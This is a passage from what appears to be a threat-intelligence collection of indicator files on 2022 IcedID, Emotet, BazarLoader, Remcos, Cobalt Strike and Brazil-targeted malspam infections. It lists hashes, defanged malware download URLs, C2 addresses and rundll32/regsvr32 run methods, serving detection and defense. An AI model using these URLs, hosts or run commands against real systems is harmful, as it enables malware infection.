| - SHA256 hash: cfc202b44509f2f607d365858a8218dfdc6b26f8087efcc5e46f4fef9ab53705 43 | - File size: 341,898 bytes 44 | - File name: C:\Users\[username]\AppData\Roaming\WrongEvolve\license.dat 45 | - File 
description: license.dat binary needed to run persistent IcedID DLL 46 | 47 | - SHA256 hash: 2d5584e4c30e2a82e8da600bf6686ba261d838f27fc82d1c8feff8c1bb4ee5e3 48 | - File size: 120,320 bytes 49 | - File name: C:\Users\[username]\AppData\Local\iyraed2\{6CC49CA5-BD87-48D5-05CE-51176ABC04C6}\owkaidmi.dll 50 | - File description: Persistent IcedID DLL (persistent through scheduled task) 51 | - Run method: rundll32.exe [filename],DllMain --fi="[path to license.dat]" 52 | 53 | TRAFFIC FOR INSTALLER DLL: 54 | 55 | - 146.19.233[.]44 port 80 - copelandbenefitg[.]com - GET /frhe/[long string]/repa7?[long string] 56 | 57 | TRAFFIC CAUSED BY ICEDID INSTALLER DLL: 58 | 59 | - port 443 - aws.amazon[.]com - HTTPS traffic 60 | - 94.140.112[.]17 port 80 - jeliskvosh[.]com - GET / 61 | 62 | ICEDID C2 TRAFFIC: 63 | 64 | - 87.120.8[.]98 port 443 - baeswea[.]com - IcedID C2 HTTPS traffic 65 | 66 | COBALT STRIKE TRAFFIC: 67 | 68 | - 108.62.118[.]215 port 443 - solobiv[.]com - Cobalt Strike HTTPS traffic 69 | 70 | DARK VNC TRAFFIC: 71 | 72 | - 88.119.161[.]76 port 8080 - encoded/encrypted TCP traffic for DarkVNC 73 | -------------------------------------------------------------------------------- /2022-01-04-IOCs-from-Remcos-RAT-infection.txt: -------------------------------------------------------------------------------- 1 | 2022-01-04 (TUESDAY) - WELLS FARGO-THEMED MALSPAM LEADS TO REMCOS RAT 2 | 3 | CHAIN OF EVENTS: 4 | 5 | - email --> attached Excel file --> enable macros --> OneDrive URL --> VBS file --> obfuscated script from two HTTP URLs ending in .jpg --> Remcos RAT C2 traffic 6 | 7 | EMAIL INFO: 8 | 9 | - Date: Tue, 4 Jan 2022 19:14 UTC 10 | - Subject: Wellfargo Payment Remittance Notice-1/4/22 11 | - Attachment: Payment Remittance Advice_000000202213.xlsb 12 | 13 | ATTACHMENT INFO: 14 | 15 | - SHA256 hash: b1df072eba923c472e461200b35823fde7f8e640bfb468ff5ac707369a2fa35e 16 | - File size: 156,401 bytes 17 | - File name: Payment Remittance Advice_000000202213.xlsb 18 | - File 
description: Attachment to email: Excel file with macro code for Remcos RAT 19 | 20 | URL GENERATED BY MACRO: 21 | 22 | - hxxp://onedrive[.]live.com/download?cid=64F8294A00286885&resid=64F8294A00286885%21770&authkey=ABI3zrc6BsVUKxU 23 | 24 | VBS FILE RETURNED FROM ONEDRIVE URL: 25 | 26 | - SHA256 hash: 95c0a9e6463a2eb1bbfe3198cd4b6cd74927a209ca4ab17501c2f444494f4499 27 | - File size: 2,340 bytes 28 | - File location: hxxps://onedrive.live[.]com/download?cid=64F8294A00286885&resid=64F8294A00286885%21770&authkey=ABI3zrc6BsVUKxU 29 | - File location: C:\Users\[username]\AppData\Local\Temp\misc.vbs 30 | - File location: C:\Users\[username]\AppData\Local\Microsoft\misc.vbs 31 | 32 | TRAFFIC GENERATED BY DOWNLOADED VBS FILE: 33 | 34 | - 64.188.19[.]241 port 80 - 64.188.19[.]241 - GET /atcn.jpg 35 | - 104.223.119[.]167 port 80 - 104.223.119[.]167 - GET /calient.jpg 36 | - 79.134.225[.]79 port 10174 - shiestynerd.dvrlists[.]com - encrypted SSL/TLS traffic 37 | 38 | DLL FILE EXTRACTED FROM OBFUSCATED SCRIPT RETURNED BY 104.223.119[.]167: 39 | 40 | - SHA256 hash: 73ee036d191c9b2d717e94b2bae87622fce097a42d61594ee8cc1ab5b92749f1 41 | - File size: 409,882 bytes 42 | - File type: PE32 DLL, 32-bit Mono/.Net assembly 43 | -------------------------------------------------------------------------------- /2022-01-12-IOCs-for-IcedID-with-Cobalt-Strike-and-DarkVNC.txt: -------------------------------------------------------------------------------- 1 | 2022-01-12 (WEDNESDAY) - ICEDID (BOKBOT) WITH COBALT STRIKE AND DARK VNC 2 | 3 | NOTES: 4 | 5 | - This campaign first reported on Tuesday 2022-01-11 in this Twitter thread: https://twitter.com/executemalware/status/1481048885284020230 6 | 7 | INFECTION CHAIN: 8 | 9 | - email --> link --> downloaded XLL file --> dropped DLL for IcedID installer --> web traffic --> persistent IcedID --> IcedID C2 --> Follow-up malware (Cobalt Strike and DarkVNC) 10 | 11 | URL FROM MALSPAM: 12 | 13 | - 
hxxps://www.royalcityplumbing[.]ca/wp-content/plugins/wp-roilbask/includes/?FQUVPKMwuZrjyvabRIB 14 | 15 | DOWNLOADED XLL FILE: 16 | 17 | - SHA256 hash: c9c6b253530238054aa343c132836c934b94413d1c768ed77417e6c7a72edd00 18 | - File size: 72,704 bytes 19 | - File location: hxxps://www.royalcityplumbing[.]ca/wp-content/plugins/wp-roilbask/includes/?FQUVPKMwuZrjyvabRIB 20 | - File name: DH-1641998904.xll 21 | - File description: Downloaded Excel add-on file 22 | 23 | INSTALLER DLL: 24 | 25 | - SHA256 hash: cbd2e49a46f4f9df1bbcd8eb7ba048692a3ddf0108aef42ff5381c3a3c572b0f 26 | - File size: 42,496 bytes 27 | - File location: C:\Users\[username]\JavaClassObjectCm.dll 28 | - File description: Installer DLL for IcedID 29 | - Run method: rundll32.exe [filename],DllGetClassObject 30 | 31 | GZIP BINARY: 32 | 33 | - SHA256 hash: a2c8441342c1ebd7d5fe65dc59fc17ded908f3888feb6659aefb97b0fc476d9d 34 | - File size: 457,853 bytes 35 | - File location: hxxp://olerantand[.]top/ 36 | - File type: gzip compressed data, was "Orphan.txt", from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 2529244 37 | - File description: gzip binary retrieved by installer to create license.dat and persistent IcedID DLL 38 | 39 | LICENSE.DAT: 40 | 41 | - SHA256 hash: cfc202b44509f2f607d365858a8218dfdc6b26f8087efcc5e46f4fef9ab53705 42 | - File size: 341,898 bytes 43 | - File location: C:\Users\[username]\AppData\Roaming\FirstInherit\license.dat 44 | - File description: data file used to run persistent IcedID DLL 45 | - Note: First submitted to VirusTotal on 2021-11-24 46 | 47 | PERSISTENT ICEDID DLL: 48 | 49 | - SHA256 hash: e7b98a1b6c6b463d309a2a067b8c7362888e5d1d96ce983558c96e96c8d73ad9 50 | - File size: 115,200 bytes 51 | - File location: C:\Users\[username]\AppData\Roaming\kosohu\Gigaod32\Jugeejmo2.dll 52 | - File description: Persistent DLL for IcedID 53 | - Run method: rundll32.exe [filename],DllMain --exibga="[path to license.dat]" 54 | 55 | TRAFFIC FOR THE GZIP BINARY: 56 | 57 | - 
159.89.171[.]14 port 80 - olerantand[.]top - GET / 58 | 59 | ICEDID C2 IP ADDRESSES AND DOMAINS: 60 | 61 | - 45.147.228[.]138 port 443 - charliedeffer[.]store 62 | - 45.147.228[.]138 port 443 - hashingold[.]top 63 | - 45.147.228[.]138 port 443 - namerikode[.]uno 64 | - 185.70.186[.]133 port 443 - lasticjugs[.]top 65 | - 185.70.186[.]133 port 443 - ouldmakeithapp[.]top 66 | 67 | COBALT STRIKE BINARY: 68 | 69 | - SHA256 hash: 94053dfbc06bc7124129dd51fabf67f7f3738109d6dc11d0b4bb785f0e93c0b6 70 | - File size: 398,336 bytes 71 | - File location: hxxp://104.168.44[.]45/download/4564.exe 72 | - File location: C:\Users\[username]\AppData\Local\Temp\Ayfaga3.exe 73 | - File description: EXE for Cobalt Strike seen as follow-up to IcedID infection 74 | 75 | COBALT STRIKE TRAFFIC: 76 | 77 | - 104.168.44[.]45 port 80 - 104.168.44[.]45 - GET /download/4564.exe 78 | - 104.168.44[.]45 port 443 - HTTPS Cobalt Strike traffic 79 | 80 | UNUSUAL TRAFFIC (DON'T KNOW WHAT THIS WAS CAUSED BY): 81 | 82 | - 185.70.184[.]43 port 8572 - HTTPS/SSL/TLS traffic 83 | 84 | DARK VNC TRAFFIC: 85 | 86 | - 45.147.228[.]197 port 8080 - encrypted or otherwise encoded traffic 87 | 88 | -------------------------------------------------------------------------------- /2022-02-07-IOCs-for-BazarLoader-with-Cobalt-Strike.txt: -------------------------------------------------------------------------------- 1 | 2022-02-07 (MONDAY) - BAZARLOADER INFECTION WITH COBALT STRIKE 2 | 3 | INFECTION CHAIN: 4 | 5 | - email --> OneDrive link --> downloaded .iso file --> double-click (mount) .iso file --> double-click Windows shortcut --> BazarLoader infection --> Bazar C2 --> Cobalt Strike 6 | 7 | EXAMPLE OF ONEDRIVE LINK: 8 | 9 | - hxxp://1drv[.]ms/u/s!AoKLsbl6G4QIgQiYSBQ37JfA8_fl?e=ecg04E 10 | 11 | - NOTE: The above OneDrive link was taken down by Microsoft shortly after it was reported as malicious 12 | 13 | DOWNLOADED ISO FILE: 14 | 15 | - SHA256 hash: 0900b4eb02bdcaefd21df169d21794c8c70bfbc68b2f0612861fcabc82f28149 16 
| - File size: 307,200 bytes 17 | - File name: docs_1309.iso 18 | 19 | CONTENTS OF ISO FILE: 20 | 21 | - SHA256 hash: 303be66bb8f026a9153b749eff2446fe5a0f9f75c52c49af84210187d257f2de 22 | - File size: 1,385 bytes 23 | - File name: Attachments.lnk 24 | - File type: MS Windows shortcut 25 | - Shortcut: C:\Windows\System32\rundll32.exe documents.log,vspa 26 | 27 | - SHA256 hash: 8a09d53d9663eda55e91e4803a5222be9b3b0c804173b6a918d13c35ad1d0134 28 | - File size: 253,440 bytes 29 | - File name: documents.log 30 | - File type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows 31 | - Run method: rundll32.exe [filename],vspa 32 | 33 | BAZAR C2 TRAFFIC: 34 | 35 | - 5.182.207.28 port 443 - hxxps://5.182.207[.]28/data/service 36 | - 198.252.108.16 port 443 - hxxps://198.252.108[.]16/data/service 37 | - 80.71.158.142 port 443 - attempted TCP connections 38 | - 84.32.188.136 port 443 - hxxps://84.32.188[.]136/data/service 39 | 40 | COBALT STRIKE BINARY: 41 | 42 | - SHA256 hash: 12f7f6b7e1840a15e141abadf099efa435a608afb19176816f131f5172bd7cd2 43 | - File size: 98,712 bytes 44 | - File location: C:\Users\[username]\AppData\Local\Temp\BEB2.dll 45 | - File type: PE32 executable (DLL) (console) Intel 80386, for MS Windows 46 | - Run method: regsvr32.exe [filename] 47 | 48 | COBALT STRIKE C2 TRAFFIC: 49 | 50 | - 23.82.141[.]117 port 443 - 
zoroxeku[.]com - HTTPS traffic 51 | -------------------------------------------------------------------------------- /2022-02-17-IOCs-for-Bazil-targeted-malware-infection.txt: -------------------------------------------------------------------------------- 1 | 2022-02-17 (THURSDAY) - WINDOWS INFECTION ACTIVITY FROM BRAZIL-TARGETED MALSPAM 2 | 3 | EMAIL HEADERS: 4 | 5 | Received: from thiag77940[.]vds (mail01.nota-comercio.com [195.28.183[.]90]) 6 | (using TLSv1.3 with cipher TLS_AES_256_GCM_SHA384 (256/256 bits) 7 | key-exchange X25519 server-signature RSA-PSS (2048 bits) server-digest SHA256) 8 | (No client certificate requested) 9 | by [recipient's mail server] (Postfix) with ESMTPS id 4JzGT109qhz3wZQ 10 | for <[recipient's email address]>; Wed, 16 Feb 2022 11:49:03 +0000 (UTC) 11 | Received: by thiag77940[.]vds (Postfix, from userid 0) 12 | id 9A0DC7EA80; Wed, 16 Feb 2022 11:48:38 +0000 (UTC) 13 | Subject: Arquivo NF-e - Pedido N (46512154) 14 | From: nfe@nfpaulista.com 15 | Message-Id: <20220216114838.9A0DC7EA80@thiag77940[.]vds> 16 | Date: Wed, 16 Feb 2022 11:48:38 +0000 (UTC) 17 | 18 | LINK FROM THE EMAIL: 19 | 20 | - hxxp://nfe5.doomdns[.]org/ 21 | 22 | TRAFFIC FROM AN INFECTED WINDOWS HOST: 23 | 24 | - 20.77.245[.]61 port 80 - nfe5.doomdns[.]org - GET / 25 | - 20.77.245[.]61 port 80 - download2.go.dyndns[.]org - GET /5E%2028%205B%205E_5E128%205B%205E_5E%2028%205B%205E_5E128%205B%205E_5E%2028%205B%205E_5E128%205B%205E_/ 26 | - 20.77.245[.]61 port 80 - nfe6.dyndns[.]ws - GET /Nota.zip 27 | - 52.161.99[.]171 port 80 - plugtree.duckdns[.]org - GET /libwinpthread-1.css 28 | - 20.77.245[.]61 port 80 - clientes.is-saved[.]org - POST /clientes/postUP.php 29 | 30 | ASSOCIATED MALWARE: 31 | 32 | - SHA256 hash: eb5a367f80ee1dd72a5b7ae184dddf6d4b72f2799f0ff8f221b8a79728734264 33 | - File size: 2,699,362 bytes 34 | - File location: hxxp://nfe6.dyndns[.]ws/Nota.zip 35 | - File description: Zip archive downloaded after clicking link in email 36 | 37 | - SHA256 hash: 
5b84585b8335d7f30f3891ab75d55c9caf67c40499a2297f01ade237d29f012c 38 | - File size: 2,862,080 bytes 39 | - File name: GHDJ-87678A-1A.msi 40 | - File description: MSI file extracted from above zip archive 41 | 42 | - SHA256 hash: d76dda172fd4cb6abf1edd258c34bc05eb457a13ecb1e4beeea1fbf7e74ddcf3 43 | - File size: 18,900,737 bytes 44 | - File location: hxxp://plugtree.duckdns[.]org/libwinpthread-1.css 45 | - File description: Zip archive retrieved by above MSI file 46 | - Note: This zip archive contains files used to run the Pidgin chat client for Windows, along with a malicious DLL run by pidgin.exe 47 | 48 | - SHA256 hash: 32e13b3fcf43c37184b5b5eaca2a32ba24342260dea8514b19187f20cc417514 49 | - File size: 809,772,783 bytes 50 | - File name: libpurple.dll 51 | - File description: malicious 32-bit DLL run by pidgin.exe 52 | 53 | Note: The above DLL is padded with null bytes at the end of the file. At nearly 810 MB, this malware is too large to submit to Virus Total or other online analysis tools. A carved version with most of the null bytes removed is listed below. 
54 | 55 | - SHA256 hash: e1ddfe00dd1ada634b965c9e444cbd52fa02770d7dd1c3c31949b5e52fff4049 56 | - File size: 12,134,400 bytes 57 | - File description: The above libpurple.dll file with most of the null bytes at the end of the file removed 58 | -------------------------------------------------------------------------------- /2022-02-22-Emotet-epoch4-IOCs.txt: -------------------------------------------------------------------------------- 1 | 2022-02-22 (TUESDAY) - EMOTET EPOCH 4 INDICATORS 2 | 3 | NOTE: 4 | 5 | - This is a small set of indicators for Emotet epoch 4 activity on 2022-02-22 6 | 7 | SHA256 HASHES FROM 2 EXAMPLES OF PASSWORD-PROTECTED ZIP ATTACHMENT AND EXTRACTED EXCEL FILES: 8 | 9 | - NOTE: zip password: 4vahobk5lzs 10 | - 2393aa0a0424086dc266fd5b5370f1f7a365f5c70ae33334a4d760cd084e19de 2022-22-02_1239.zip 11 | - 0ccfb233a6d245f9f626e6f2e320497c44870d23ac070821490de5495ad5978a 2022-22-02_1239.xls 12 | - 3689034e54b8e8cd72b779daf8e35765f495e46ca0107affd702e1ec731a576b 2022-22-02_1617.zip 13 | - dfcb4b56f39a4578d47734699e8d24036bee228940fe3f2db3f7ec6876b4fd9e 2022-22-02_1617.xls 14 | 15 | SHA256 HASHES FROM 12 EXAMPLES OF ATTACHED EXCEL FILES: 16 | 17 | - 258ef1257f5d2f90eeb7b0e1a948e08bfc0e25cc014f86e05df02a344c5eabdf Barker Cabinets.xls 18 | - 2b87f525b90d47410cb6240f949140ff81d39b467ebe675bffaf2f0b360a16a7 Payment.xls 19 | - 36ea088ffc747d149aab4ddf89182ce618edb7754b8643e4d9ae69dbabd759c8 ACH Payment info.xls 20 | - 3dac3ccac97fe026839c988180072987c7fe20d4eacdf76868564480879c2f72 Global Information Technology Inc.xls 21 | - 52c27e74e1d7a494cda92876fe33c1e397dbc53cf9e5657e4590a9af77f57f3b 1008397229627355965.xls 22 | - 5813667c73a3ec74cb979c55c19102e819f659bc97d24fa4888b2612c982fff3 HHC774705930DP.xls 23 | - 69b8ed3cdc49ffc2638df7d3c12e53fc553f12cca769fdc2030ec8f739e3cdc8 PO 02222022.xls 24 | - 6bf75d05768e1c4417ffa6a98a7154041992b9888e3252983bb6d796a7fb4deb comments_208697167.xls 25 | - ba07555c7cb0e846bb693ac3d391b47cad49443bae7dfae2e43e65d70c6eb2d0 
OVW-010222 IVLY-220222.xls 26 | - c9332bc46897abfface9a0a4400475c552c970a180176d2b8e5a18b1635594f1 PA-2241 report.xls 27 | - d33426fc6cd7365ed49d0c847600e1a73be2630c033601260c63bc4b4aeeeac5 Scott Murdock Trailer Sales.xls 28 | - f67e201abcb2128d7df61e93171e5a9072a29601047a727acd37b392afda790a B and C Body Company.xls 29 | 30 | SHA256 HASH FOR C:\PROGRAMDATA\BBIWJDF.VBS DROPPED AFTER ENABLING EXCEL MACRO: 31 | 32 | - 31cb0d7a224f16ec4e998140c4efde8ef752295b8a88080915f0bb2b49034bee 33 | 34 | ABOVE VBS USES THE FOLLOWING URLS TO RETRIEVE AN EMOTET DLL: 35 | 36 | - hxxp://wearsweetbomb[.]com/wp-content/15zZybP1EXttxDK4JH/ 37 | - hxxps://1566xueshe[.]com/wp-includes/z92ZVqHH8/ 38 | - hxxp://mymicrogreen.mightcode[.]com/Fox-C/NWssAbNOJDxhs/ 39 | - hxxp://o2omart.co[.]in/infructuose/m4mgt2MeU/ 40 | - hxxp://mtc.joburg.org[.]za/-/GBGJeFxXWlNbABv2/ 41 | - hxxp://www.ama[.]cu/jpr/VVP/ 42 | - hxxp://actividades.laforetlanguages[.]com/wp-admin/dU8Ds/ 43 | - hxxps://dwwmaster[.]com/wp-content/1sR2HfFxQnkWuu/ 44 | - hxxps://edu-media[.]cn/wp-admin/0JAE/ 45 | - hxxps://iacademygroup[.]cl/office/G42LJPLkl/ 46 | - hxxps://znzhou[.]top/mode/0Qb/ 47 | 48 | SHA256 HASH FOR AN EMOTET DLL AT C:\PROGRAMDATA\OIPHILFJ.DLL: 49 | 50 | - b4b5d17481e99f072a5b7c568248579611b91bfc7e6c893ab2a4fd74f2b48414 51 | 52 | EMOTET C2 FROM AN INFECTED WINDOWS HOST: 53 | 54 | - 134.209.156[.]68:443 55 | - 144.217.88[.]125:443 56 | - 156.67.219[.]84:7080 57 | - 175.107.196[.]192:80 -------------------------------------------------------------------------------- /2022-02-22-Emotet-epoch5-IOCs.txt: -------------------------------------------------------------------------------- 1 | 2022-02-22 (TUESDAY) - EMOTET EPOCH 5 INDICATORS 2 | 3 | NOTE: 4 | 5 | - This is a small set of indicators for Emotet epoch 5 activity on 2022-02-22 6 | 7 | SHA256 HASHES FROM 5 EXAMPLES OF ATTACHED EXCEL FILES: 8 | 9 | - 296694bd1aed4a2e6d1ba06859e978a869dac37d3a7d1d7a1b3ed1f44cbd1979 97-22022022.xls 10 | - 
5bb4f8da9b1de0a2472b752b640c418f851756002b739dc78d1459f04d9af600 Data 4.xls 11 | - 5bcf051f92d382bee159d249ab6551fcfa4c41573aca4e28ef275694820b6370 479DA-2778.xls 12 | - 6bf75d05768e1c4417ffa6a98a7154041992b9888e3252983bb6d796a7fb4deb comments_208697167.xls 13 | - ecdf22c55102caa1405093b2fb7fdd178f233c39fdd750a123dd1409919ba695 Untitled-0438531018.xls 14 | 15 | SHA256 HASH FOR C:\PROGRAMDATA\BBIWJDF.VBS DROPPED AFTER ENABLING EXCEL MACRO: 16 | 17 | - 555c1a3f0d1ff08f3a45c7558ded360c36b86541eae3ba84eb6b5aaba0c4c661 18 | 19 | ABOVE VBS USES THE FOLLOWING URLS TO RETRIEVE AN EMOTET DLL: 20 | 21 | - hxxp://boardingschoolsoftware[.]com/backup/VC7WK/ 22 | - hxxp://towardsun[.]net/admin/O29Fja/ 23 | - hxxp://47.244.189[.]73/well-known/cwxgmEZsYIT/ 24 | - hxxp://centrobilinguelospinos[.]com/wp-admin/AivCY/ 25 | - hxxp://qqziyuanwang[.]com/wp-includes/KtXrm5GwJ/ 26 | - hxxps://www.swaong[.]com/b/SVSAPzeDU657xJdmJv/ 27 | - hxxps://trasix[.]com/wp-admin/FzpdyUrlGt/ 28 | - hxxps://marineboyrecords[.]com/font-awesome/t37LOj/ 29 | - hxxps://edgetactical.ritabilisim[.]com/admin/NbjDzEeNJ/ 30 | - hxxp://cairm[.]xyz/backup_1/mQPAhJhpV/ 31 | - hxxp://vrstar-park[.]com/wp-includes/0bAm9feNorwTmVrj/ 32 | - hxxps://panaderialaimperial[.]com/wp-includes/Oi0guE0CQbyBJVg/ 33 | 34 | SHA256 HASH FOR AN EMOTET DLL AT C:\PROGRAMDATA\OIPHILFJ.DLL: 35 | 36 | - a83c22f222be787c8c45ea6eb55b7f07c8c7cba6b5c8233b075bb2472a8f4acb 37 | 38 | EMOTET C2 FROM AN INFECTED WINDOWS HOST: 39 | 40 | - 27.254.174[.]84:8080 41 | - 43.229.206[.]214:8080 42 | - 59.148.253[.]194:443 43 | - 61.7.231[.]229:443 44 | - 142.93.76[.]76:7080 45 | - 168.197.250[.]14:80 46 | - 180.250.21[.]2:443 -------------------------------------------------------------------------------- /2022-03-03-IOCs-for-Bazil-targeted-malware-infection.txt: -------------------------------------------------------------------------------- 1 | 2022-03-03 (THURSDAY) - WINDOWS INFECTION ACTIVITY FROM BRAZIL-TARGETED MALSPAM 2 | 3 | NOTE: 4 | 5 | - We 
reported a similar infection using similar indicators on 2022-02-17: https://twitter.com/Unit42_Intel/status/1496172957726560257 6 | 7 | EMAIL HEADERS: 8 | 9 | Received: from ruvds-bxhg9 (unknown [194.87.107[.]33]) 10 | (using TLSv1.3 with cipher TLS_AES_256_GCM_SHA384 (256/256 bits) 11 | key-exchange X25519 server-signature RSA-PSS (2048 bits) server-digest SHA256) 12 | (No client certificate requested) 13 | by [recipient's mail server] (Postfix) with ESMTPS id 4K8Gs81q4bzFpVs 14 | for <[recipient's email address]>; Thu, 3 Mar 2022 03:37:43 +0000 (UTC) 15 | Received: by ruvds-bxhg9 (Postfix, from userid 0) 16 | id C89E4E2C5E; Thu, 3 Mar 2022 06:07:02 +0300 (MSK) 17 | content-type: text/html 18 | Subject: NF-e - Pedido N (46512154) 19 | From: nfe@empresajobs.com 20 | Message-Id: <20220303033528.C89E4E2C5E@ruvds-bxhg9> 21 | Date: Thu, 3 Mar 2022 03:07:02 -0000 (UTC) 22 | 23 | LINK FROM THE EMAIL: 24 | 25 | hxxp://fiscal.servebbs[.]com 26 | 27 | TRAFFIC FROM AN INFECTED WINDOWS HOST: 28 | 29 | - 20.77.245[.]61 port 80 - fiscal.servebbs[.]com - GET / HTTP/1.1 30 | - 20.77.245[.]61 port 80 - fiscal.servebbs[.]com - GET /favicon.ico HTTP/1.1 31 | - 20.77.245[.]61 port 80 - download2.go.dyndns[.]org - GET /5E%2028%205B%205E_5E128%205B%205E_5E%2028%205B%205E_5E128%205B%205E_5E%2028%205B%205E_5E128%205B%205E_/ HTTP/1.1 32 | - 20.77.245[.]61 port 80 - fiscal.homelinux[.]com - GET /Nota.zip HTTP/1.1 33 | - 52.161.99[.]171 port 80 - plugtree.duckdns[.]org - GET /libwinpthread-1.css HTTP/1.1 34 | - 20.77.245[.]61 port 80 - clientes.is-saved[.]org - POST /clientes/postUP.php HTTP/1.0 35 | 36 | ASSOCIATED MALWARE: 37 | 38 | - SHA256 hash: 9b86c38d0c1f3db86087cdd6463500843061180bd92f9f485ac674e0c6bdb9ea 39 | - File size: 2,698,165 bytes 40 | - File location: hxxp://fiscal.homelinux[.]com/Nota.zip 41 | - File description: Zip archive downloaded after clicking link in email 42 | 43 | - SHA256 hash: 6c646d75e7b79221a518ad57812991945e08a4679fbd51b44b1fb3bfe15870e3 44 | - File size: 
2,862,080 bytes 45 | - File name: IM-87678A-1A1.msi 46 | - File description: MSI file extracted from above zip archive 47 | 48 | - SHA256 hash: 2ac951c753fd352c6f4fed3644ef770b05afbd25a1282400d7fc1070d7743ae9 49 | - File size: 18,200,641 bytes 50 | - File location: hxxp://plugtree.duckdns[.]org/libwinpthread-1.css 51 | - File description: Zip archive retrieved by above MSI file 52 | - Note: This zip archive contains files used to run the Pidgin chat client for Windows, along with a malicious DLL run by pidgin.exe 53 | 54 | - SHA256 hash: 3afb9a436ca84260a2d7876646a6b999ece5c5a6a7f0f464ee6ca40e5b639834 55 | - File size: 12,226,048 bytes 56 | - File name: libpurple.dll 57 | - File description: malicious 32-bit DLL run by pidgin.exe 58 | -------------------------------------------------------------------------------- /2022-03-03-IOCs-for-Emotet-epoch4-with-Cobalt-Strike.txt: -------------------------------------------------------------------------------- 1 | 2022-03-03 (THURSDAY) - EMOTET EPOCH 4 INFECTION WITH COBALT STRIKE 2 | 3 | EMAIL HEADERS: 4 | 5 | - Received: from mbkd5118.ocn.ad[.]jp (mbkd5118.ocn.ad[.]jp [210.163.237[.]19]) 6 | - Received: from mf-smf-unw002c1.ocn.ad[.]jp (mf-smf-unw002c1.ocn.ad.jp [153.138.219[.]69]) 7 | - Received: from ocn-vc-mts-204c1.ocn.ad[.]jp ([125.206.160[.]20]) 8 | - Received: from ocn-sdpx-mts-106c1.ocn.ad[.]jp ([211.16.10[.]147]) 9 | - Received: from [83.149.169[.]122] (unknown [83.149.169[.]122]) 10 | - From: [spoofed sender name] 11 | - Subject: RE: 12 | - Message-ID: <1646294430.PgNxnZGKUhFIAPgNxnnFKx@ocn-vc-mts-204c1.ocn.ad[.]jp> 13 | - Attachment name: Form - Mar 03, 2022.xlsm 14 | 15 | EMAIL ATTACHMENT: 16 | 17 | - SHA256 hash: a962e9bd50bc35620f3faac38c064389b7bab79eb497ddd84f83bf2e39033e18 18 | - File size: 46,701 bytes 19 | - File name: Form - Mar 03, 2022.xlsm 20 | - File description: Excel file with macro for Emotet epoch 4 21 | 22 | URLS GENERATED BY ABOVE EXCEL MACRO CODE FOR EMOTET EPOCH 4 DLL: 23 | 24 | - 
hxxp://piajimenez[.]com/Fox-C/dS4nv3spYd0DZsnwLqov/ 25 | - hxxp://inopra[.]com/wp-includes/3zGnQGNCvIKuvrO7T/ 26 | - hxxp://biomedicalpharmaegypt[.]com/sapbush/BKEaVq1zoyJssmUoe/ 27 | - hxxps://getlivetext[.]com/Pectinacea/AL5FVpjleCW/ 28 | - hxxp://janshabd[.]com/Zgye2/ 29 | - hxxps://justforanime[.]com/stratose/PonwPXCl/ 30 | 31 | EMOTET EPOCH 4 DLL: 32 | 33 | - SHA256 hash: 0758b3cde229886a039202120cda4485426c56eed3596be75fbce0d38986bf03 34 | - File size: 638,976 bytes 35 | - File location: - hxxp://piajimenez[.]com/Fox-C/dS4nv3spYd0DZsnwLqov/ 36 | - File location: C:\enu.ocx 37 | - File location: C:\Users\[username]\AppData\Local\Snirakw\pzgi.por 38 | - File description: Windows DLL file for Emotet epoch 4 39 | - Run method: regsvr32.exe /s [filename] 40 | 41 | FOLLOW-UP MALWARE (COBALT STRIKE): 42 | 43 | - SHA256 hash: 9f968a4a386057575174533e82c2eeb0b39c1875a07b6a8d1a8124962abe11e7 44 | - File size: 673,792 bytes 45 | - File location: C:\Users\[username]\AppData\Local\Snirakw\dehpaxvktbwu.exe 46 | - File description: Windows EXE file for Cobalt Strike 47 | - Post-infection traffic: hxxps://gfsert[.]com/jquery-3.3.1.min.js 48 | 49 | - SHA256 hash: 100e1dc124dc6131617b5610ee750e529cda80fcaf0ee5437b3e27db150ee860 50 | - File size: 1,202,176 bytes 51 | - File location: C:\Users\[username]\AppData\Local\Snirakw\rahgobkzm.dll 52 | - File description: Windows DLL file for Cobalt Strike 53 | - Run method: regsvr32.exe /s [filename] 54 | - Post-infection traffic: hxxps://zxerm[.]com/jquery-3.3.1.min.js 55 | 56 | TRAFFIC FROM AN INFECTED WINDOWS HOST: 57 | 58 | - 144.208.73[.]119 port 80 - piajimenez[.]com - GET /Fox-C/dS4nv3spYd0DZsnwLqov/ 59 | 60 | - 139.180.205[.]161 port 443 - attempted TCP connections 61 | - 209.15.236[.]39 port 8080 - attempted TCP connections 62 | - 195.154.253[.]60 port 8080 - attempted TCP connections 63 | - 217.182.143[.]207 port 443 - HTTPS traffic 64 | - 217.79.180[.]211 port 8080 - HTTPS traffic 65 | 66 | - 139.60.160[.]52 port 443 - 
gfsert.com - hxxps://gfsert[.]com/jquery-3.3.1.min.js 67 | - 139.60.161[.]53 port 443 - zxerm.com - hxxps://zxerm[.]com/jquery-3.3.1.min.js 68 | - 45.77.212[.]132 port 444 - (formatordpink[.]com) - hxxps://formatordpink[.]com/tab_shop.js 69 | 70 | - NOTE: Could not find an associated Cobalt Strike binary for traffic on 45.77.212[.]132 over TCP port 444. 71 | -------------------------------------------------------------------------------- /2022-03-21-IOCs-for-Cobalt-Strike-from-IcedID-infection.txt: -------------------------------------------------------------------------------- 1 | 2022-03-21 (MONDAY) - COBALT STRIKE FROM ICEDID (BOKBOT): 2 | 3 | POST-INFECTION ICEDID C2 TRAFFIC: 4 | 5 | - 157.245.142[.]66 port 443 - antnosience[.]com - HTTPS traffic 6 | 7 | SUSPICIOUS ACTIVITY SEEN WITHIN 1 MINUTE BEFORE COBALT STRIKE TRAFFIC: 8 | 9 | - port 443 - filebin[.]net - HTTPS traffic (a legitimate file sharing service) 10 | - port 443 - situla.bitbit[.]net - HTTPS traffic (another domain associated with file sharing) 11 | 12 | COBALT STRIKE 64-BIT EXE: 13 | 14 | - SHA256 hash: 09d8fb54a22c3bb753fce7dc5192221122cf5dc26b42504ffca254e2521dbf8e 15 | - File size: 474,624 bytes 16 | - File location: C:\Users\[username]\AppData\Local\Temp\ifof.exe 17 | - File type: PE32+ executable (GUI) x86-64, for MS Windows 18 | - Sample: https://bazaar.abuse.ch/sample/09d8fb54a22c3bb753fce7dc5192221122cf5dc26b42504ffca254e2521dbf8e/ 19 | 20 | 21 | COBALT STRIKE C2 TRAFFIC: 22 | 23 | - 23.227.198[.]203 port 757 - hxxps://bupdater[.]com:757/link.css 24 | -------------------------------------------------------------------------------- /2022-04-05-IOCs-for-Bumblebee-and-Cobalt-Strike.txt: -------------------------------------------------------------------------------- 1 | 